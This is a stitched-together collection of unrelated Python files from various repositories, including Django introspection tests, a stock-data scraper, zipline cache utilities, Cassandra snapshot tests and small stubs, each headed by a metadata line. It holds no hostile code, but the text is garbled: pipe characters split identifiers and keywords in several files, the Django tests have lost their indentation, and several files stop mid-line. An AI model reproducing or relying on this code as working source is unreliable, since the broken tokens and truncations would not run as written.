def test_get_table_description_types(self):
cursor = connection.cursor()
desc = connection.introspection.get_table_description(cursor, Reporter._meta.db_table)
self.assertEqual(
[datatype(r[1], r) for r in desc],
['IntegerField', 'CharField', 'CharField', 'CharField', 'BigIntegerField']
)
# Oracle forces null=True under the hood in some cases (see
# https://docs.djangoproject.com/en/dev/ref/databases/#null-and-empty-strings)
# so its idea about null_ok in cursor.description is different from ours.
@skipIfDBFeature('interprets_empty_strings_as_nulls')
def test_get_table_description_nullable(self):
cursor = connection.cursor()
desc = connection.introspection.get_table_description(cursor, Reporter._meta.db_table)
self.assertEqual(
[r[6] for r in desc],
[False, False, False, False, True]
)
# Regression test for #9991 - 'real' types in postgres
@skipUnlessDBFeature('has_real_datatype')
def test_postgresql_real_type(self):
cursor = connection.cursor()
cursor.execute("CREATE TABLE django_ixn_real_test_table (number REAL);")
desc = connection.introspection.get_table_description(cursor, 'django_ixn_real_test_table')
cursor.execute('DROP TABLE django_ixn_real_test_table;')
self.assertEqual(datatype(desc[0][1], desc[0]), 'FloatField')
def test_get_relations(self):
cursor = connection.cursor()
relations = connection.introspection.get_relations(cursor, Article._meta.db_table)
# Older versions of MySQL don't have the chops to report on this stuff,
# so just skip it if no relations come back. If they do, though, we
# should test that the response is correct.
if relations:
# That's {field_index: (field_index_other_table, other_table)}
self.assertEqual(relations, {3: (0, Reporter._meta.db_table)})
def test_get_key_columns(self):
cursor = connection.cursor()
key_columns = connection.introspection.get_key_columns(cursor, Article._meta.db_table)
self.assertEqual(key_columns, [('reporter_id', Reporter._meta.db_table, 'id')])
def test_get_primary_key_column(self):
cursor = connection.cursor()
primary_key_column = connection.introspection.get_primary_key_column(cursor, Article._meta.db_table)
self.assertEqual(primary_key_column, 'id')
def test_get_indexes(self):
cursor = connection.cursor()
indexes = connection.introspection.get_indexes(cursor, Article._meta.db_table)
self.assertEqual(indexes['reporter_id'], {'unique': False, 'primary_key': False})
def test_get_indexes_multicol(self):
"""
Test that multicolumn indexes are not included in the introspection
results.
"""
cursor = connection.cursor()
indexes = connection.introspection.get_indexes(cursor, Reporter._meta.db_table)
self.assertNotIn('first_name', indexes)
self.assertIn('id', indexes)
def datatype(dbtype, description):
    """Helper to convert a data type into a string."""
    dt = connection.introspection.get_field_type(dbtype, description)
    # Some backends return (field_type, params); keep only the type name.
    return dt[0] if type(dt) is tuple else dt
|
arokem/pyAFQ | examples/plot_afq_reco80.py | Python | bsd-2-clause | 2,044 | 0.002446 | """
==========================
RecoBundles80 using AFQ API
==========================
An example using the AFQ API to run recobundles with the
`80 bundle atlas <https://figshare.com/articles/Advanced_Atlas_of_80_Bundles_in_MNI_space/7375883>`_.
"""
import os.path as op
import plotly
from AFQ.api.group import GroupAFQ
import AFQ.data.fetch as afd
##########################################################################
# Get some example data
# ---------------------
#
# Retrieves `Stanford HARDI dataset <https://purl.stanford.edu/ng782rw8378>`_.
#
afd.organize_stanford_data(clear_previous_afq=True)
##########################################################################
# Set tractography parameters (optional)
# ---------------------
# We make this tracking_params which we will pass to the AFQ object
# which specifies that we want 50,000 seeds randomly distributed
# in the white matter.
#
# We only do this to make this example faster and consume less space.
tracking_params = dict(n_seeds=50000,
random_seeds=Tru | e,
rng_seed=42)
##########################################################################
# Initialize an AFQ object:
# -------------------------
#
# We specify seg_algo as reco80 in segmentation_params. This tells the AFQ
# object to perform RecoBundles using the 80 bundles atlas in the
# segmentation step.
myafq = GroupAFQ(bids_path=op.join(afd.afq_home,
| 'stanford_hardi'),
preproc_pipeline='vistasoft',
segmentation_params={"seg_algo": "reco80"},
tracking_params=tracking_params)
##########################################################################
# Visualizing bundles and tract profiles:
# ---------------------------------------
# This would run the script and visualize the bundles using the plotly
# interactive visualization, which should automatically open in a
# new browser window.
bundle_html = myafq.all_bundles_figure
plotly.io.show(bundle_html["01"])
|
kaija/tw-stock | stock.py | Python | mit | 11,215 | 0.009362 | import datetime
i | mport httplib
import urllib
import os.path
import csv
import time
from datetime import timedelta
import pandas as pd
import numpy as np
def isfloat(value):
try:
float(value)
return | True
except ValueError:
return False
def totimestamp(dt, epoch=datetime.date(1970,1,1)):
    """Return the Unix timestamp (whole seconds) for date *dt*.

    *epoch* defaults to 1970-01-01; pass a different date to rebase.
    """
    td = dt - epoch
    # return td.total_seconds()
    # Floor division keeps the result an integer under Python 3 as well;
    # plain '/' would return a float there.
    return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) // 10**6
class stockImport(object):
    def __init__(self
            ):
        # No state to initialize; just announce construction.
        print ('setup stock importer')
def saveDate(self, date=None):
date_str = date.strftime("%m/%d/%Y")
print('{} finished'.format(date_str))
f = open('./twstock.tmp', 'w')
f.write(date_str)
def loadDate(self):
try:
f = open('./twstock.tmp', 'r')
date_str = f.readline()
#default set to 4 PM
return datetime.datetime.strptime(date_str + " 16:00:00", "%m/%d/%Y %H:%M:%S")
except IOError:
return datetime.datetime.strptime("1/1/2010 16:00:00", "%m/%d/%Y %H:%M:%S")
    def downloadData(self):
        """Download any missing daily TWSE CSV dumps into ./data/.

        Walks every calendar day from 2004-02-11 up to today (or tomorrow
        when run after hour 16) and fetches data/YYYYMMDD.csv from
        www.twse.com.tw for each day whose file is not already on disk.

        NOTE(review): Python 2 only (httplib/urllib, print statements);
        responses are saved verbatim, including non-trading days.
        """
        start_day = datetime.date(2004, 2, 11);
        today = datetime.date.today()
        one_day = timedelta(days=1)
        # Only the hour (h) is used below; note the unpack shadows the
        # builtin `min` locally.
        y, m, d, h, min, sec, wd, yd, i = datetime.datetime.now().timetuple()
        end_time = today
        if h > 16:
            # Evening run: today's file should be available, so include it.
            end_time = today + one_day
        print "start download missing data"
        print "checking from " + start_day.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d")
        print "checking end time " + end_time.strftime("%Y-%m-%d")
        download_date = start_day
        while download_date < end_time:
            file_name = "data/" + download_date.strftime("%Y%m%d") + ".csv"
            if os.path.isfile(file_name):
                # Already downloaded on a previous run -- skip.
                download_date += one_day
                continue
            httpreq = httplib.HTTPConnection('www.twse.com.tw')
            #http://www.twse.com.tw/exchangeReport/MI_INDEX?response=csv&date=20170526&type=ALL
            #headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
            print
            # ROC calendar year (Gregorian - 1911); built for the legacy
            # POST endpoint but unused by the GET request below.
            date_str = str(download_date.year - 1911 ) + download_date.strftime("/%m/%d")
            form = urllib.urlencode({'download': 'csv', 'qdate': date_str, 'selectType': 'ALLBUT0999'})
            #httpreq.request("POST", "/ch/trading/exchange/MI_INDEX/MI_INDEX.php", form, headers);
            full_url = "exchangeReport/MI_INDEX?response=csv&date=" + download_date.strftime("%Y%m%d") + "&type=ALL"
            print full_url
            httpreq.request("GET", "http://www.twse.com.tw/exchangeReport/MI_INDEX?response=csv&date=" + download_date.strftime("%Y%m%d") + "&type=ALL");
            httpres = httpreq.getresponse()
            stock_csv = httpres.read()
            print "downloading " + file_name
            f = open(file_name, "w")
            f.write(stock_csv)
            download_date += one_day
    def insertToStock(self, stockid, row, date):
        """Append one day's *row* (a 1-row DataFrame) to bystock/<id>.csv.

        The per-stock CSV is treated as a date-indexed store:
        - date already present: do nothing (idempotent);
        - CSV exists but lacks the date (KeyError): concat and rewrite;
        - CSV missing (IOError): seed it with this row.
        """
        try:
            date_str = date.strftime("%Y-%m-%d")
            df = pd.DataFrame.from_csv('bystock/' + stockid + '.csv')
            #check if there is a key
            # .loc raises KeyError when date_str is absent -- that is the
            # signal to insert below.
            df.loc[date_str].count()
            #key already exist. skip it
        except KeyError:
            #no such key. insert it
            df = pd.concat([df, row])
            df.to_csv('bystock/' + stockid + '.csv')
            #print df
        except IOError:
            print('stock id: {} not exist'.format(stockid))
            row.to_csv('bystock/' + stockid + '.csv')
def prepcsv(self, csv):
ret = []
for i in csv:
tmp = i
tmp = tmp.replace(',', '')
tmp = tmp.replace('\'', '')
tmp = tmp.replace('\"', '')
tmp = tmp.replace('=', '')
ret.append(tmp)
return ret
    def convertCSV(self, file_path=None, date=None):
        """Parse one daily TWSE dump and fan its rows out per stock id.

        Only 17-column rows are processed; each becomes a one-row
        DataFrame indexed by *date* and is handed to insertToStock().
        Column indices used (after prepcsv cleaning): 2->TV, 3->TC,
        4->TO, 5->OP, 6->HP, 7->LP, 8->CP, 9/10->direction and change,
        15->PE -- presumably volume/transactions/turnover and OHLC;
        confirm against the TWSE MI_INDEX format.
        """
        print('convert csv {}'.format(file_path))
        with open(file_path, 'rb') as csvfile:
            spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
            for row in spamreader:
                if len(row) < 16:
                    #abnormal some column missing?
                    continue
                #if len(row) == 17:
                    #abnormal should not more than 16 column
                    #print(row)
                if len(row) == 17:
                    # Strip the Excel guards (="...") around the stock id.
                    stockid=row[0].replace('=', '')
                    stockid=stockid.replace('"', '')
                    stockid=stockid.strip()
                    if stockid.startswith('('):
                        # Parenthesised ids are not stock rows -- skip.
                        continue
                    checkrow = row[11].replace(',', '')
                    checkrow = checkrow.replace('"', '')
                    checkrow = checkrow.replace('=', '')
                    if not checkrow[0].isdigit():
                        #skip column title
                        continue
                    row = self.prepcsv(row)
                    TV=int(row[2])
                    TC=int(row[3])
                    TO=int(row[4])
                    RD=row[9]
                    # Direction column: '+' rise, '-' fall, anything else flat.
                    if RD == '+':
                        DF=float(row[10])
                        RD=1
                    elif RD == '-':
                        DF=0-float(row[10])
                        RD=-1
                    else:
                        DF=0
                        RD=0
                    PE=float(row[15])
                    try:
                        OP=float(row[5])
                        CP=float(row[8])
                        HP=float(row[6])
                        LP=float(row[7])
                    except ValueError:
                        # Non-numeric prices (presumably untraded days) are
                        # stored as None.
                        OP=None
                        CP=None
                        HP=None
                        LP=None
                    #print('OP:{} CP:{} HP:{} LP:{} DF:{} RD:{} TV:{} TC:{} TO:{}\n'.format( OP, CP, HP, LP, DF, RD, TV, TC, TO))
                    cols = ['OP', 'CP', 'HP', 'LP', 'DF', 'RD', 'TV', 'TC', 'TO']
                    date_index = pd.date_range(date.strftime("%m/%d/%Y"), periods=1)
                    df1 = pd.DataFrame([[OP, CP, HP, LP, DF, RD, TV, TC, TO]], columns=cols)
                    df1['date'] = date_index
                    df1 = df1.set_index(['date'])
                    #print stockid
                    #print df1
                    self.insertToStock(stockid, df1, date)
        self.saveDate(date)
    def getExpectCP(self, df, date):
        """Closing price ('CP') on *date*, or the next day that has data.

        Recurses forward one day at a time (skipping holidays/weekends
        missing from the index) and returns None once *date* passes today.

        NOTE(review): compares *date* against datetime.date.today();
        confirm callers pass plain dates, not datetimes.
        """
        today = datetime.date.today()
        one_day = timedelta(days=1)
        if date > today:
            #print "over today"
            #print date.strftime("%Y-%m-%d")
            return None
        try:
            date_str = date.strftime("%Y-%m-%d")
            return df.loc[date_str, 'CP']
        except KeyError as e:
            return self.getExpectCP(df, date + one_day)
def loadTrainDataById(self, stock_id, start_date, days, expect):
one_day = timedelta(days=1)
stop_date = start_date + one_day * days
expect_date = start_date + one_day * (days + expect)
today = datetime.date.today()
if stop_date > today:
return None
try:
start_date_str = start_date.strftime("%Y-%m-%d")
stop_date_str = stop_date.strftime("%Y-%m-%d")
expect_date_str = expect_date.strftime("%Y-%m-%d")
df = pd.DataFrame.from_csv('bystock/' + stock_id + '.csv')
print "from:" + start_date_str + " to:" + stop_date_str
dft = df.loc[start_date_str:stop_date_str]
#print dft.as_matrix()
#print dft.reset_index().values
dfcp = df.loc[start_date_str:stop_date_str, 'CP']
#print df.loc[start_date_str:expect_date_str, 'CP']
expcp = self.getExpectCP(df, expect_date)
if expcp == None:
return
#print dfcp
print 'max during train:' + str(dfcp.max())
print str(expect) + ' days ' + expect_date_str + ' close price' + str(expcp)
if expcp > dfcp.max():
print 'up'
else:
|
humdings/zipline | zipline/utils/cache.py | Python | apache-2.0 | 10,994 | 0 | """
Caching utilities for zipline
"""
from collections import MutableMapping
import errno
import os
import pickle
from distutils import dir_util
from shutil import rmtree, move
from tempfile import mkdtemp, NamedTemporaryFile
import pandas as pd
from .context_tricks import nop_context
from .paths import ensure_directory
from .sentinel import sentinel
class Expired(Exception):
    """Raised when a :class:`CachedObject` is past its expiration date."""
ExpiredCachedObject = sentinel('ExpiredCachedObject')
AlwaysExpired = sentinel('AlwaysExpired')
class CachedObject(object):
    """A value paired with an expiration date.

    The cached value may be unwrapped at any time up to and including
    ``expires``; any strictly later time raises :class:`Expired`.

    Parameters
    ----------
    value : object
        The object to cache.
    expires : datetime-like
        Last instant at which the value may still be unwrapped.

    Examples
    --------
    >>> from pandas import Timestamp, Timedelta
    >>> expires = Timestamp('2014', tz='UTC')
    >>> obj = CachedObject(1, expires)
    >>> obj.unwrap(expires - Timedelta('1 minute'))
    1
    >>> obj.unwrap(expires)
    1
    >>> obj.unwrap(expires + Timedelta('1 minute'))
    ... # doctest: +IGNORE_EXCEPTION_DETAIL
    Traceback (most recent call last):
       ...
    Expired: 2014-01-01 00:00:00+00:00
    """

    def __init__(self, value, expires):
        self._value = value
        self._expires = expires

    @classmethod
    def expired(cls):
        """Build an instance that is already expired at every time."""
        return cls(ExpiredCachedObject, expires=AlwaysExpired)

    def unwrap(self, dt):
        """Return the cached value as of time ``dt``.

        Raises
        ------
        Expired
            Raised when ``dt`` is greater than the expiration date.
        """
        when = self._expires
        if when is AlwaysExpired or when < dt:
            raise Expired(self._expires)
        return self._value

    def _unsafe_get_value(self):
        """Bypass expiration checking; you almost certainly shouldn't."""
        return self._value
class ExpiringCache(object):
    """Mapping of keys to :class:`CachedObject` values.

    Lookups unwrap the stored value; an expired entry is evicted and
    reported as a missing key.

    Parameters
    ----------
    cache : dict-like, optional
        Backing store; must support at least ``__delitem__``,
        ``__getitem__`` and ``__setitem__``.  A plain dict is used when
        omitted.

    Examples
    --------
    >>> from pandas import Timestamp, Timedelta
    >>> expires = Timestamp('2014', tz='UTC')
    >>> value = 1
    >>> cache = ExpiringCache()
    >>> cache.set('foo', value, expires)
    >>> cache.get('foo', expires - Timedelta('1 minute'))
    1
    >>> cache.get('foo', expires + Timedelta('1 minute'))
    Traceback (most recent call last):
        ...
    KeyError: 'foo'
    """

    def __init__(self, cache=None):
        # Fall back to a plain dict when no backing store is supplied.
        self._cache = {} if cache is None else cache

    def get(self, key, dt):
        """Return the value stored under ``key`` as of time ``dt``.

        Raises
        ------
        KeyError
            Raised when ``key`` is absent or its entry has expired;
            expired entries are deleted as a side effect.
        """
        try:
            return self._cache[key].unwrap(dt)
        except Expired:
            del self._cache[key]
            raise KeyError(key)

    def set(self, key, value, expiration_dt):
        """Store ``value`` under ``key``.

        The entry stays valid for dates up to and including
        ``expiration_dt`` and is considered expired strictly after it.
        """
        self._cache[key] = CachedObject(value, expiration_dt)
class dataframe_cache(MutableMapping):
    """A disk-backed cache for dataframes.

    ``dataframe_cache`` is a mutable mapping from string names to pandas
    DataFrame objects.
    This object may be used as a context manager to delete the cache
    directory on exit.

    Parameters
    ----------
    path : str, optional
        The directory path to the cache. Files will be written as
        ``path/<keyname>``.
    lock : Lock, optional
        Thread lock for multithreaded/multiprocessed access to the cache.
        If not provided no locking will be used.
    clean_on_failure : bool, optional
        Should the directory be cleaned up if an exception is raised in the
        context manager.
    serialization : {'msgpack', 'pickle:<n>'}, optional
        How should the data be serialized. If ``'pickle'`` is passed, an
        optional pickle protocol can be passed like: ``'pickle:3'`` which says
        to use pickle protocol 3.

    Notes
    -----
    The syntax ``cache[:]`` will load all key:value pairs into memory as a
    dictionary.
    The cache uses a temporary file format that is subject to change between
    versions of zipline.
    """
    def __init__(self,
                 path=None,
                 lock=None,
                 clean_on_failure=True,
                 serialization='msgpack'):
        self.path = path if path is not None else mkdtemp()
        self.lock = lock if lock is not None else nop_context
        self.clean_on_failure = clean_on_failure

        if serialization == 'msgpack':
            self.serialize = pd.DataFrame.to_msgpack
            self.deserialize = pd.read_msgpack
            self._protocol = None
        else:
            # Anything else must look like 'pickle' or 'pickle:<protocol>'.
            # (Fixes two garbled lines: `serial | ization` / `| raise`.)
            s = serialization.split(':', 1)
            if s[0] != 'pickle':
                raise ValueError(
                    "'serialization' must be either 'msgpack' or 'pickle[:n]'",
                )
            self._protocol = int(s[1]) if len(s) == 2 else None

            self.serialize = self._serialize_pickle
            self.deserialize = pickle.load

        ensure_directory(self.path)

    def _serialize_pickle(self, df, path):
        # Pickle-based writer used when serialization='pickle[:n]'.
        with open(path, 'wb') as f:
            pickle.dump(df, f, protocol=self._protocol)

    def _keypath(self, key):
        # Each key is stored as one file directly under self.path.
        return os.path.join(self.path, key)

    def __enter__(self):
        return self

    def __exit__(self, type_, value, tb):
        if not (self.clean_on_failure or value is None):
            # we are not cleaning up after a failure and there was an exception
            return

        with self.lock:
            rmtree(self.path)

    def __getitem__(self, key):
        # ``cache[:]`` is a documented special case: load everything.
        if key == slice(None):
            return dict(self.items())

        with self.lock:
            try:
                with open(self._keypath(key), 'rb') as f:
                    return self.deserialize(f)
            except IOError as e:
                if e.errno != errno.ENOENT:
                    raise
                # A missing file simply means a missing key.
                raise KeyError(key)

    def __setitem__(self, key, value):
        with self.lock:
            self.serialize(value, self._keypath(key))

    def __delitem__(self, key):
        with self.lock:
            try:
                os.remove(self._keypath(key))
            except OSError as e:
                if e.errno == errno.ENOENT:
                    # raise a keyerror if this directory did not exist
                    raise KeyError(key)

                # reraise the actual oserror otherwise
                raise

    def __iter__(self):
        return iter(os.listdir(self.path))

    def __len__(self):
        return len(os.listdir(self.path))

    def __repr__(self):
        return '<%s: keys={%s}>' % (
            type(self).__name__,
            ', '.join(map(repr, sorted(self))),
        )
class working_file(object):
"""A context manager for managing a temporary file that will be moved
to a non-temp |
snazy/cassandra-dtest | snapshot_test.py | Python | apache-2.0 | 23,150 | 0.003024 | import distutils.dir_util
import glob
import os
import shutil
import subprocess
import time
from cassandra.concurrent import execute_concurrent_with_args
from dtest import (Tester, cleanup_cluster, create_ccm_cluster, create_ks,
debug, get_test_path)
from tools.assertions import assert_one
from tools.files import replace_in_file, safe_mkdtemp
from tools.hacks import advance_to_next_cl_segment
from tools.misc import ImmutableMapping
from tools.decorators import since
class SnapshotTester(Tester):
    """Shared helpers for snapshot dtests: schema/data setup plus taking,
    copying and restoring nodetool snapshots.

    (Fixes garbled `| def restore_snapshot` / `xra | nge` tokens.)
    """

    def create_schema(self, session):
        """Create keyspace ks (RF=1) holding a minimal table ks.cf."""
        create_ks(session, 'ks', 1)
        session.execute('CREATE TABLE ks.cf ( key int PRIMARY KEY, val text);')

    def insert_rows(self, session, start, end):
        """Insert rows with keys [start, end) into ks.cf (constant val)."""
        insert_statement = session.prepare("INSERT INTO ks.cf (key, val) VALUES (?, 'asdf')")
        args = [(r,) for r in range(start, end)]
        execute_concurrent_with_args(session, insert_statement, args, concurrency=20)

    def make_snapshot(self, node, ks, cf, name):
        """Flush, snapshot ks.cf as *name* and copy the snapshot files of
        every data directory into a temp dir laid out as
        ``<tmpdir>/<data-dir-index>/<ks>/<cf>``.  Returns the temp dir.
        """
        debug("Making snapshot....")
        node.flush()
        snapshot_cmd = 'snapshot {ks} -cf {cf} -t {name}'.format(ks=ks, cf=cf, name=name)
        debug("Running snapshot cmd: {snapshot_cmd}".format(snapshot_cmd=snapshot_cmd))
        node.nodetool(snapshot_cmd)
        tmpdir = safe_mkdtemp()
        os.mkdir(os.path.join(tmpdir, ks))
        os.mkdir(os.path.join(tmpdir, ks, cf))
        # Find the snapshot dir, it's different in various C* versions:
        # newer ones suffix the table directory (cf-<id>), hence the glob.
        x = 0
        for data_dir in node.data_directories():
            snapshot_dir = "{data_dir}/{ks}/{cf}/snapshots/{name}".format(data_dir=data_dir, ks=ks, cf=cf, name=name)
            if not os.path.isdir(snapshot_dir):
                snapshot_dirs = glob.glob("{data_dir}/{ks}/{cf}-*/snapshots/{name}".format(data_dir=data_dir, ks=ks, cf=cf, name=name))
                if len(snapshot_dirs) > 0:
                    snapshot_dir = snapshot_dirs[0]
                else:
                    continue
            debug("snapshot_dir is : " + snapshot_dir)
            debug("snapshot copy is : " + tmpdir)
            # Copy files from the snapshot dir to existing temp dir
            distutils.dir_util.copy_tree(str(snapshot_dir), os.path.join(tmpdir, str(x), ks, cf))
            x += 1
        return tmpdir

    def restore_snapshot(self, snapshot_dir, node, ks, cf):
        """Run sstableloader on every per-data-dir snapshot copy.

        Raises Exception when sstableloader exits non-zero.
        """
        debug("Restoring snapshot....")
        for x in xrange(0, self.cluster.data_dir_count):
            snap_dir = os.path.join(snapshot_dir, str(x), ks, cf)
            if os.path.exists(snap_dir):
                ip = node.address()
                args = [node.get_tool('sstableloader'), '-d', ip, snap_dir]
                p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                stdout, stderr = p.communicate()
                exit_status = p.wait()
                if exit_status != 0:
                    raise Exception("sstableloader command '%s' failed; exit status: %d'; stdout: %s; stderr: %s" %
                                    (" ".join(args), exit_status, stdout, stderr))

    def restore_snapshot_schema(self, snapshot_dir, node, ks, cf):
        """Re-create the schema by sourcing each snapshot's schema.cql."""
        debug("Restoring snapshot schema....")
        for x in xrange(0, self.cluster.data_dir_count):
            schema_path = os.path.join(snapshot_dir, str(x), ks, cf, 'schema.cql')
            if os.path.exists(schema_path):
                node.run_cqlsh(cmds="SOURCE '%s'" % schema_path)
class TestSnapshot(SnapshotTester):
    """End-to-end snapshot/restore tests on a single-node cluster."""
    def test_basic_snapshot_and_restore(self):
        # Snapshot 100 rows, write 100 more, wipe the keyspace, restore,
        # and verify only the snapshotted 100 rows come back.
        cluster = self.cluster
        cluster.populate(1).start()
        (node1,) = cluster.nodelist()
        session = self.patient_cql_connection(node1)
        self.create_schema(session)
        self.insert_rows(session, 0, 100)
        snapshot_dir = self.make_snapshot(node1, 'ks', 'cf', 'basic')
        # Write more data after the snapshot, this will get thrown
        # away when we restore:
        self.insert_rows(session, 100, 200)
        rows = session.execute('SELECT count(*) from ks.cf')
        self.assertEqual(rows[0][0], 200)
        # Drop the keyspace, make sure we have no data:
        session.execute('DROP KEYSPACE ks')
        self.create_schema(session)
        rows = session.execute('SELECT count(*) from ks.cf')
        self.assertEqual(rows[0][0], 0)
        # Restore data from snapshot:
        self.restore_snapshot(snapshot_dir, node1, 'ks', 'cf')
        node1.nodetool('refresh ks cf')
        rows = session.execute('SELECT count(*) from ks.cf')
        # clean up (before the final assert so the dir goes away on failure)
        debug("removing snapshot_dir: " + snapshot_dir)
        shutil.rmtree(snapshot_dir)
        self.assertEqual(rows[0][0], 100)
    @since('3.0')
    def test_snapshot_and_restore_drop_table_remove_dropped_column(self):
        """
        @jira_ticket CASSANDRA-13730
        Dropping table should clear entries in dropped_column table
        """
        cluster = self.cluster
        cluster.populate(1).start()
        node1, = cluster.nodelist()
        session = self.patient_cql_connection(node1)
        # Create schema and insert some data
        create_ks(session, 'ks', 1)
        session.execute("CREATE TABLE ks.cf (k int PRIMARY KEY, a text, b text)")
        session.execute("INSERT INTO ks.cf (k, a, b) VALUES (1, 'a', 'b')")
        assert_one(session, "SELECT * FROM ks.cf", [1, "a", "b"])
        # Take a snapshot and drop the column and then drop table
        snapshot_dir = self.make_snapshot(node1, 'ks', 'cf', 'basic')
        session.execute("ALTER TABLE ks.cf DROP b")
        assert_one(session, "SELECT * FROM ks.cf", [1, "a"])
        session.execute("DROP TABLE ks.cf")
        # Restore schema and data from snapshot, data should be the same as input
        self.restore_snapshot_schema(snapshot_dir, node1, 'ks', 'cf')
        self.restore_snapshot(snapshot_dir, node1, 'ks', 'cf')
        node1.nodetool('refresh ks cf')
        assert_one(session, "SELECT * FROM ks.cf", [1, "a", "b"])
        # Clean up
        debug("removing snapshot_dir: " + snapshot_dir)
        shutil.rmtree(snapshot_dir)
    @since('3.11')
    def test_snapshot_and_restore_dropping_a_column(self):
        """
        @jira_ticket CASSANDRA-13276
        Can't load snapshots of tables with dropped columns.
        """
        cluster = self.cluster
        cluster.populate(1).start()
        node1, = cluster.nodelist()
        session = self.patient_cql_connection(node1)
        # Create schema and insert some data
        create_ks(session, 'ks', 1)
        session.execute("CREATE TABLE ks.cf (k int PRIMARY KEY, a text, b text)")
        session.execute("INSERT INTO ks.cf (k, a, b) VALUES (1, 'a', 'b')")
        assert_one(session, "SELECT * FROM ks.cf", [1, "a", "b"])
        # Drop a column
        session.execute("ALTER TABLE ks.cf DROP b")
        assert_one(session, "SELECT * FROM ks.cf", [1, "a"])
        # Take a snapshot and drop the table
        snapshot_dir = self.make_snapshot(node1, 'ks', 'cf', 'basic')
        session.execute("DROP TABLE ks.cf")
        # Restore schema and data from snapshot
        self.restore_snapshot_schema(snapshot_dir, node1, 'ks', 'cf')
        self.restore_snapshot(snapshot_dir, node1, 'ks', 'cf')
        node1.nodetool('refresh ks cf')
        assert_one(session, "SELECT * FROM ks.cf", [1, "a"])
        # Clean up
        debug("removing snapshot_dir: " + snapshot_dir)
        shutil.rmtree(snapshot_dir)
class TestArchiveCommitlog(SnapshotTester):
cluster_options = ImmutableMapping({'commitlog_segment_size_in_mb': 1})
def make_snapshot(self, node, ks, cf, name):
debug("Making snapshot....")
node.flush()
snapshot_cmd = 'snapshot {ks} -cf {cf} -t {name}'.format(ks=ks, cf=cf, name=name)
debug("Running snapshot cmd: {snapshot_cmd}".format(snapshot_cmd=snapshot_cmd))
node.nodetool(snapshot_cmd)
tmpdirs = []
base_tmpdir = safe_mkdtemp()
for x in xrange(0, self.cluster.data_dir_count):
tmpdir = os.path.join(base_tmpdir, str(x))
os.mkdir(tmpdir)
# Copy files from the snapshot dir to existing temp dir
dist |
SublimeText/Modelines | tests/sublime_plugin.py | Python | mit | 206 | 0.024272 | class Plugin(object):
pass
class ApplicationCommand(Plugin):
    """Stub standing in for Sublime Text's ApplicationCommand base."""
class WindowCommand(Plugin):
    """Stub standing in for Sublime Text's WindowCommand base.

    (Fixes the garbled class name `WindowComma | nd`.)
    """
class TextCommand(Plugin):
    """Stub standing in for Sublime Text's TextCommand base."""
class EventListener(Plugin):
    """Stub standing in for Sublime Text's EventListener base.

    (Fixes the garbled class name `Even | tListener`.)
    """
boriel/zxbasic | src/arch/z80/optimizer/labelinfo.py | Python | gpl-3.0 | 704 | 0.00142 | # -*- coding: utf-8 -*-
# (Fixes a garbled `from | src...` line.)
from src.api.identityset import IdentitySet

from . import common
from . import errors
class LabelInfo(object):
    """Describes an assembly label: its name, address, owning basic block
    and the set of basic blocks that reference it.
    """

    def __init__(self, label, addr, basic_block=None, position=0):
        """Stores the label name, the address counter into memory (rather
        useless) and which basic block contains it.

        Raises DuplicatedLabelError when *label* is already registered in
        the global common.LABELS table.
        """
        self.label = label
        self.addr = addr
        self.basic_block = basic_block
        self.position = position  # Position within the block
        self.used_by = IdentitySet()  # Which BB uses this label, if any

        if label in common.LABELS:
            raise errors.DuplicatedLabelError(label)
|
vied12/superdesk | server/publicapi/tests/prepopulate_init_app_test.py | Python | agpl-3.0 | 2,453 | 0.000815 | # -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014, 2015 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
from publicapi.tests import ApiTestCase
from unittest import mock
from unittest.mock import MagicMock
_fake_prepopulate_resource = MagicMock()
_fake_prepopulate_service = MagicMock()
_fake_backend = MagicMock(name='superdesk backend')
_fake_app = MagicMock(name='app')
def _fake_get_backend():
    """Stand-in for superdesk.get_backend returning the mocked backend."""
    return _fake_backend
class FakePrepopulateService():
    """Test double for the prepopulate service.

    Records the endpoint name and backend it was constructed with, and
    compares equal to another instance built with the same endpoint name
    and the identical (``is``) backend object.
    """

    def __init__(self, endpoint_name, backend=None):
        self.endpoint_name = endpoint_name
        self.backend = backend

    def __eq__(self, other):
        # Short-circuit: the backend is only compared when the names match.
        return (
            self.endpoint_name == other.endpoint_name and
            self.backend is other.backend
        )

    def __ne__(self, other):
        return not self.__eq__(other)
@mock.patch('publicapi.prepopulate.PrepopulateResource', _fake_prepopulate_resource)
@mock.patch('publicapi.prepopulate.PrepopulateService', FakePrepopulateService)
@mock.patch('superdesk.get_backend', _fake_get_backend)
@mock.patch('superdesk.app', _fake_app)
class PrepopulateInitAppTestCase(ApiTestCase):
    """Base class for the `prepopulate.init_app` function tests.

    The class-level patches replace the resource/service classes and the
    superdesk backend/app for the duration of each test method.
    """
    def _get_target_function(self):
        """Return the function under test.

        Make the test fail immediately if the function cannot be imported.
        """
        try:
            from publicapi.prepopulate import init_app
        except ImportError:
            self.fail("Could not import function under test (init_app).")
        else:
            return init_app
    def test_instantiates_prepopulate_resource_with_correct_arguments(self):
        _fake_app.config = {'SUPERDESK_PUBLICAPI_TESTING': True}
        # Expected service: built with the mocked superdesk backend.
        fake_prepopulate_service = FakePrepopulateService('prepopulate', _fake_get_backend())
        init_app = self._get_target_function()
        init_app(_fake_app)
        # init_app must call PrepopulateResource('prepopulate', app=..., service=...).
        self.assertTrue(_fake_prepopulate_resource.called)
        args, kwargs = _fake_prepopulate_resource.call_args
        self.assertTrue(len(args) > 0 and args[0] == 'prepopulate')
        self.assertIs(kwargs.get('app'), _fake_app)
        self.assertEqual(kwargs.get('service'), fake_prepopulate_service)
|
sergpolly/Thermal_adapt_scripts | perform_indexing.py | Python | mit | 731 | 0.012312 | import sys
from Bio import SeqIO

# See the corresponding description in the project's wiki.
# Usage: perform_indexing.py <inventory> <db_file> {genbank|fasta}
inventory = sys.argv[1]
db_file = sys.argv[2]
seq_format = sys.argv[3]

# Sanity checks are omitted for such a short and simple script.
# Read the names of the files to be indexed (one per line).
with open(inventory, 'r') as fp:
    fnames = [line.strip() for line in fp.readlines()]

# Build the on-disk index; the key function depends on the format.
